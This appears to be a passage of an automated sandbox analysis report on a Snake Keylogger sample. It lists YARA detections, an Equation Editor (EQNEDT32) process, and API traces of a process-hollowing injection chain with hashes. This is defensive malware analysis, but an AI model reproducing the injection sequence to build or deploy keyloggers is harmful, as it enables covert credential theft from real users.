                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:9
                                                                                                          Start time:03:20:01
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.2%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.6%
                                                                                                            Total number of Nodes:116
                                                                                                            Total number of Limit Nodes:2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1802 2eaee8-2eafbb NtQueryInformationProcess 1804 2eafbd-2eafc3 1802->1804 1805 2eafc4-2eaffa 1802->1805 1804->1805
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 002EAFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: 71a7b2cb8296c0917fa0688036e69a7969973b57ea94c00ed892b3e7c2dcbb0f
                                                                                                            • Instruction ID: 40bad5d1a5efa597b90c67d0d6dff9e35f85954e72727bd98cc9f85553cdc782
                                                                                                            • Opcode Fuzzy Hash: 71a7b2cb8296c0917fa0688036e69a7969973b57ea94c00ed892b3e7c2dcbb0f
                                                                                                            • Instruction Fuzzy Hash: 4B4189B9D042589FCF10CFAAD984ADEFBB1BB49310F20902AE815B7310D375A915CF65
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 002EAFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: 87dcf37387b4e7c305593c74fce909b84f3ac1d5b4f447c083b8ec57f711db71
                                                                                                            • Instruction ID: 71172529073dfaa1f934b308f108da0f602dea689644831749ace65321eff9f6
                                                                                                            • Opcode Fuzzy Hash: 87dcf37387b4e7c305593c74fce909b84f3ac1d5b4f447c083b8ec57f711db71
                                                                                                            • Instruction Fuzzy Hash: 694176B8D042589FCF10CFAAD984ADEFBB1BB09310F20902AE818B7310D375A955CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 c54dfd-c54ea1 2 c54ea3-c54eba 0->2 3 c54eea-c54f12 0->3 2->3 8 c54ebc-c54ec1 2->8 6 c54f14-c54f28 3->6 7 c54f58-c54fae 3->7 6->7 18 c54f2a-c54f2f 6->18 16 c54ff4-c550eb CreateProcessA 7->16 17 c54fb0-c54fc4 7->17 9 c54ee4-c54ee7 8->9 10 c54ec3-c54ecd 8->10 9->3 11 c54ed1-c54ee0 10->11 12 c54ecf 10->12 11->11 15 c54ee2 11->15 12->11 15->9 36 c550f4-c551b9 16->36 37 c550ed-c550f3 16->37 17->16 25 c54fc6-c54fcb 17->25 19 c54f31-c54f3b 18->19 20 c54f52-c54f55 18->20 22 c54f3d 19->22 23 c54f3f-c54f4e 19->23 20->7 22->23 23->23 26 c54f50 23->26 28 c54fcd-c54fd7 25->28 29 c54fee-c54ff1 25->29 26->20 30 c54fd9 28->30 31 c54fdb-c54fea 28->31 29->16 30->31 31->31 33 c54fec 31->33 33->29 48 c551d5-c551d6 36->48 37->36 49 c551b0-c551b9 48->49 50 c551d8-c551d9 48->50 49->48 51 c551e9-c551ed 50->51 52 c551db-c551df 50->52 54 c551fd-c55201 51->54 55 c551ef-c551f3 51->55 52->51 53 c551e1 52->53 53->51 57 c55211-c55215 54->57 58 c55203-c55207 54->58 55->54 56 c551f5 55->56 56->54 59 c55217-c55240 57->59 60 c5524b-c55256 57->60 58->57 61 c55209 58->61 59->60 65 c55257 60->65 61->57 65->65
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C550CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID: `Qd$`Qd$`Qd
                                                                                                            • API String ID: 963392458-3206023809
                                                                                                            • Opcode ID: b8e3091c3cd3a0a5b2cc57e12c7efe322b2b9b74a3525559e7bfbdd0410b6d46
                                                                                                            • Instruction ID: 4a9431dd24d30a83ecb9c44b5543d70074488b316c6f608191a34d9afc8538d9
                                                                                                            • Opcode Fuzzy Hash: b8e3091c3cd3a0a5b2cc57e12c7efe322b2b9b74a3525559e7bfbdd0410b6d46
                                                                                                            • Instruction Fuzzy Hash: 86C10574D002598FDF25CFA8C851BEEBBB1BB09305F0091A9D819B7250DB749AC9CF95

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 66 c54e08-c54ea1 68 c54ea3-c54eba 66->68 69 c54eea-c54f12 66->69 68->69 74 c54ebc-c54ec1 68->74 72 c54f14-c54f28 69->72 73 c54f58-c54fae 69->73 72->73 84 c54f2a-c54f2f 72->84 82 c54ff4-c550eb CreateProcessA 73->82 83 c54fb0-c54fc4 73->83 75 c54ee4-c54ee7 74->75 76 c54ec3-c54ecd 74->76 75->69 77 c54ed1-c54ee0 76->77 78 c54ecf 76->78 77->77 81 c54ee2 77->81 78->77 81->75 102 c550f4-c551b9 82->102 103 c550ed-c550f3 82->103 83->82 91 c54fc6-c54fcb 83->91 85 c54f31-c54f3b 84->85 86 c54f52-c54f55 84->86 88 c54f3d 85->88 89 c54f3f-c54f4e 85->89 86->73 88->89 89->89 92 c54f50 89->92 94 c54fcd-c54fd7 91->94 95 c54fee-c54ff1 91->95 92->86 96 c54fd9 94->96 97 c54fdb-c54fea 94->97 95->82 96->97 97->97 99 c54fec 97->99 99->95 114 c551d5-c551d6 102->114 103->102 115 c551b0-c551b9 114->115 116 c551d8-c551d9 114->116 115->114 117 c551e9-c551ed 116->117 118 c551db-c551df 116->118 120 c551fd-c55201 117->120 121 c551ef-c551f3 117->121 118->117 119 c551e1 118->119 119->117 123 c55211-c55215 120->123 124 c55203-c55207 120->124 121->120 122 c551f5 121->122 122->120 125 c55217-c55240 123->125 126 c5524b-c55256 123->126 124->123 127 c55209 124->127 125->126 131 c55257 126->131 127->123 131->131
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C550CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID: `Qd$`Qd$`Qd
                                                                                                            • API String ID: 963392458-3206023809
                                                                                                            • Opcode ID: db50ca48a3e0dfb6f4a0608412e0b4e06d2db050ad9a946cd1eba5b2451373c7
                                                                                                            • Instruction ID: 130009cf621f8599ab6a832017c0a163deaaa570fd789366c4e72cfe9916f99c
                                                                                                            • Opcode Fuzzy Hash: db50ca48a3e0dfb6f4a0608412e0b4e06d2db050ad9a946cd1eba5b2451373c7
                                                                                                            • Instruction Fuzzy Hash: 4CC10474D002598FDF24DFA8C851BEEBBB1BB09305F0092A9D819B7250DB749AC9CF95

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1762 c54a68-c54adb 1764 c54af2-c54b59 WriteProcessMemory 1762->1764 1765 c54add-c54aef 1762->1765 1767 c54b62-c54bb4 1764->1767 1768 c54b5b-c54b61 1764->1768 1765->1764 1768->1767
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54B43
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: a7091f8c1bad65fe9a2e06fa0aa306f1d854fc0f8b78dd320b9cedec4f56ccaa
                                                                                                            • Instruction ID: 8d0301fecd2595ad7cc7c0940d0164ef58e55eae020004cf018503b153293512
                                                                                                            • Opcode Fuzzy Hash: a7091f8c1bad65fe9a2e06fa0aa306f1d854fc0f8b78dd320b9cedec4f56ccaa
                                                                                                            • Instruction Fuzzy Hash: 2D419BB5D012589FCF04CFA9D984AEEFBB1AB49314F24902AE814B7250D335AA45CF64

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1773 c54a70-c54adb 1775 c54af2-c54b59 WriteProcessMemory 1773->1775 1776 c54add-c54aef 1773->1776 1778 c54b62-c54bb4 1775->1778 1779 c54b5b-c54b61 1775->1779 1776->1775 1779->1778
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54B43
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 82ca8624d5595f27339b99c0c2d287e98075a12df6d586229a39a2d14e038479
                                                                                                            • Instruction ID: d86be6eea1cb1f773cf978508dc9c8910faa61c4a52ad3ee15e4ac5f75bba354
                                                                                                            • Opcode Fuzzy Hash: 82ca8624d5595f27339b99c0c2d287e98075a12df6d586229a39a2d14e038479
                                                                                                            • Instruction Fuzzy Hash: 5941AAB5D002589FCF04CFA9D984AEEFBF1BB49314F20902AE814B7210D374AA45CF68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1784 c54bc9-c54c98 ReadProcessMemory 1787 c54ca1-c54cf3 1784->1787 1788 c54c9a-c54ca0 1784->1788 1788->1787
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54C82
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 97f20a3190b9b191dbdfa1e072085e52e7af1c334f0d15f9cabbf4ab11cf8d28
                                                                                                            • Instruction ID: 250db9a886a0e8a8ca7e14905e3e4c64531460b01b2a9fb8d7d08c8ef60fd416
                                                                                                            • Opcode Fuzzy Hash: 97f20a3190b9b191dbdfa1e072085e52e7af1c334f0d15f9cabbf4ab11cf8d28
                                                                                                            • Instruction Fuzzy Hash: 3041A9B9D002589FCF10CFAAD984AEEFBB1BF49314F14942AE815B7210D734A945DF64

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1793 c54bd0-c54c98 ReadProcessMemory 1796 c54ca1-c54cf3 1793->1796 1797 c54c9a-c54ca0 1793->1797 1797->1796
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54C82
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00C549F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00C549F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C5448F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C5448F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            APIs
                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 002EBB2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DebugOutputString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1166629820-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3b2509133c60298c0ec4dc0acc1f1c38ce6aaa117c0dbd7efe026d51a1bdbc54
                                                                                                            • Instruction ID: f9e55344279b29242aabf95b755475cbcd14d61a801c431a70c9f3711f24364a
                                                                                                            • Opcode Fuzzy Hash: 3b2509133c60298c0ec4dc0acc1f1c38ce6aaa117c0dbd7efe026d51a1bdbc54
                                                                                                            • Instruction Fuzzy Hash: 50E1F874E502598FCB14DFA9C580AADFBF2BF89304F248169D814AB356D731AD41CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 29c9a72f3f0c40ba6639009c942ebacf033a6c986e1e8df1472fe0beec452917
                                                                                                            • Instruction ID: 422e5d39b838210ceeaefa4ba2b509c45843876c54e93cc2ea3942fa71dd4083
                                                                                                            • Opcode Fuzzy Hash: 29c9a72f3f0c40ba6639009c942ebacf033a6c986e1e8df1472fe0beec452917
                                                                                                            • Instruction Fuzzy Hash: 53E10A78E002598FCB14DFA9C5809ADFBB2FF89345F248169D814AB356D730AE46CF64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cb2bbc1dcebbe620defc3fc6a49d1fc89d6976633095c183bef9d77026b8938a
                                                                                                            • Instruction ID: 02de7af4f83dfca669b175a2beafb4e17d1a3cc18b894a434c7a1f10dd30da43
                                                                                                            • Opcode Fuzzy Hash: cb2bbc1dcebbe620defc3fc6a49d1fc89d6976633095c183bef9d77026b8938a
                                                                                                            • Instruction Fuzzy Hash: F0E10A78E002598FCB14DFA9C5809ADFBF2BF89345F248169D814AB356D730AE45CFA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35e19888e981b29c12fea2bea4734645edc39850dd1e2fbff4bc7367b435d9ca
                                                                                                            • Instruction ID: 10d760e2d74b838c2d9fa4cde10861cd6614b3efae8dba122300d15930ee7a4c
                                                                                                            • Opcode Fuzzy Hash: 35e19888e981b29c12fea2bea4734645edc39850dd1e2fbff4bc7367b435d9ca
                                                                                                            • Instruction Fuzzy Hash: 18E1E978E002598FCB14DFA9D5809AEFBF2BF89305F248169D814AB356D731AD45CF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c90c8813bb96bb36692de7129d1caad4d0790820685ba4c4e1e820ac275d5c4c
                                                                                                            • Instruction ID: 63b36123b33fb2240e4af11446a9803f1c2810742f8eb39a4fdc92f5025ec82f
                                                                                                            • Opcode Fuzzy Hash: c90c8813bb96bb36692de7129d1caad4d0790820685ba4c4e1e820ac275d5c4c
                                                                                                            • Instruction Fuzzy Hash: F0E10B74E002598FCB14DFA9C5809ADFBB2FF89341F248169D814AB356D730AE86CF64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b31af58e761d78a513e06b02cc3883922ed25486962ae64896d1d5d2cd1e57f
                                                                                                            • Instruction ID: 3a1d289d2ac413b3c52a8467b8e27df198dca2bd1b0d57380b53b69bfc64dd4e
                                                                                                            • Opcode Fuzzy Hash: 6b31af58e761d78a513e06b02cc3883922ed25486962ae64896d1d5d2cd1e57f
                                                                                                            • Instruction Fuzzy Hash: FAE1EA78E002598FDB18DF99C580AAEFBF2BF89305F248169D814A7356D7309D86CF64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1c8f8ec8b77ca1cb3ddbd37730a4aecff5d7687254d9678c3002ff9125a2bd14
                                                                                                            • Instruction ID: a398736b7f2c109c79e2050bd60b17432e48db25ce71e55530a4cd3536f58f9f
                                                                                                            • Opcode Fuzzy Hash: 1c8f8ec8b77ca1cb3ddbd37730a4aecff5d7687254d9678c3002ff9125a2bd14
                                                                                                            • Instruction Fuzzy Hash: B5716E75E016588FDB08DFAAC9849DEFBF2BF88300F24C166D818AB215D7349942CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f63348e3895bbbe37b23e0318f31dfb3c4b10ec272643281b156e2d18cf3c5c
                                                                                                            • Instruction ID: 8f9c82bf88348dc67c3140e0025d713c659d58710257ddd62b2b0d1aef7c3be9
                                                                                                            • Opcode Fuzzy Hash: 0f63348e3895bbbe37b23e0318f31dfb3c4b10ec272643281b156e2d18cf3c5c
                                                                                                            • Instruction Fuzzy Hash: AB516174E042598FCB15CFA9C9805AEFBF2BF8A301F2481AAC848AB356D7305D45CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc59de594e9d406947d61237d79c279b01cd2dd9789f1579dbae2427e7a562ad
                                                                                                            • Instruction ID: f46c89a16687e468d67190916c04ccbe1ae3b2e8572ad74ad2baf741a9162613
                                                                                                            • Opcode Fuzzy Hash: cc59de594e9d406947d61237d79c279b01cd2dd9789f1579dbae2427e7a562ad
                                                                                                            • Instruction Fuzzy Hash: F5510B74E042598FCB14CFA9C5805AEFBF2FF89341F2481AAD818AB256D7315E46CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c16a282f740f57a1503bd106772de294873b9c0f5542c5eb542772b396ed3135
                                                                                                            • Instruction ID: 8b1b2e3a71323c6278dc745e7e904105c7d3751f94558603d3c6ea28aba63914
                                                                                                            • Opcode Fuzzy Hash: c16a282f740f57a1503bd106772de294873b9c0f5542c5eb542772b396ed3135
                                                                                                            • Instruction Fuzzy Hash: 44517E75E006588FDB08DFAAC994A9EFBF2BF89300F24C06AD818AB215D73459468F50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.910474351.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: N
                                                                                                            • API String ID: 0-1130791706
                                                                                                            • Opcode ID: 906b1a2039126222856a7f0a1cd4e9870b620238861f0dad77e6d1380f97663e
                                                                                                            • Instruction ID: dc0f64e585c8f956ed795651e90941c7f6a2555bf1c05a049984d9061b0d7e64
                                                                                                            • Opcode Fuzzy Hash: 906b1a2039126222856a7f0a1cd4e9870b620238861f0dad77e6d1380f97663e
                                                                                                            • Instruction Fuzzy Hash: 1773E431D1075ACECB11EF68C884A99F7B1FF95300F55C69AE4596B221EB70AAC4CF42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.910917983.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6f0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: K
                                                                                                            • API String ID: 0-856455061
                                                                                                            • Opcode ID: 78717e98dcfdbe69fb650e7367ef62f949137ac9cbcdfa9fdf35d6c4c1c4797c
                                                                                                            • Instruction ID: 3134f90149e743986b9ee6fc8be9b128a4578673ff1726c9bba6eaa4eb585356
                                                                                                            • Opcode Fuzzy Hash: 78717e98dcfdbe69fb650e7367ef62f949137ac9cbcdfa9fdf35d6c4c1c4797c
                                                                                                            • Instruction Fuzzy Hash: F133D431C1461ACADB11EF68C884AADF7B1FF99300F55C69AD45C6B221EB70AAC5CF41
                                                                                                            Strings
